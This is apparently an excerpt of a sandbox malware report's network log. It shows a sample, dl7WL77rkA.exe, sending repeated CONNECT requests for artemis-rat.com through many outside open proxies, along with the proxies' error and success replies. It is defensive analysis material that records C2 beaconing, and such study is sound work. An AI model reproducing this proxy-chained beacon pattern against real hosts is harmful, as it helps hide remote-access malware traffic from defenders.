                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.264200926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139267921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.905288935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389942884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.889780998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.389583111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.048403978 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            255192.168.2.550651165.232.158.6031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.631131887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.805058002 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            256192.168.2.550489120.26.0.1188803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.631155968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.968003035 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.968111038 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            257192.168.2.550189142.54.239.141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.640146971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            258192.168.2.550679104.20.56.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.640221119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.794991016 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            259192.168.2.54996051.79.87.144304643876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.643939972 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.701899052 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.811343908 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.852349997 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:02.904412031 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            260192.168.2.550597114.129.2.8280813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.645248890 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.908647060 CET | 72 | IN | HTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            261192.168.2.550689185.162.228.48803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.646662951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.801178932 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            262192.168.2.55056647.93.114.68883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.659403086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.975790024 CET | 767 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            263192.168.2.55065412.186.205.120803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.664233923 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.855669022 CET | 325 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            264192.168.2.550684128.199.5.6588883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.664237022 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.843276024 CET | 270 | IN | HTTP/1.1 500 Internal Privoxy Error
                                                                                                                                                                                                                                                            Content-Length: 775
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 17 Jun 2000 12:00:00 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            265192.168.2.550533103.118.46.17680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.671560049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.023422956 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            266192.168.2.550743104.16.213.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.687825918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.842058897 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            267192.168.2.550568103.164.112.123100013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.689908981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.506521940 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            268192.168.2.55058784.39.112.14431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.689938068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.001635075 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            269192.168.2.54999451.210.127.15803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.700489044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.011934996 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            270192.168.2.55067638.162.17.16231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.700908899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.149676085 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            271192.168.2.550764172.67.231.3803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.701327085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.855509043 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            272192.168.2.550686186.96.50.209993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.706351042 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.232953072 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.873648882 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.913297892 CET | 19 | IN | HTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            273192.168.2.550771104.23.119.91803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.707282066 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.861582994 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            274192.168.2.55060994.45.74.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.718184948 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            275192.168.2.55072720.118.1.11280003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.721568108 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.920970917 CET | 176 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Length: 19
                                                                                                                                                                                                                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                            Data Ascii: 404 page not found


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
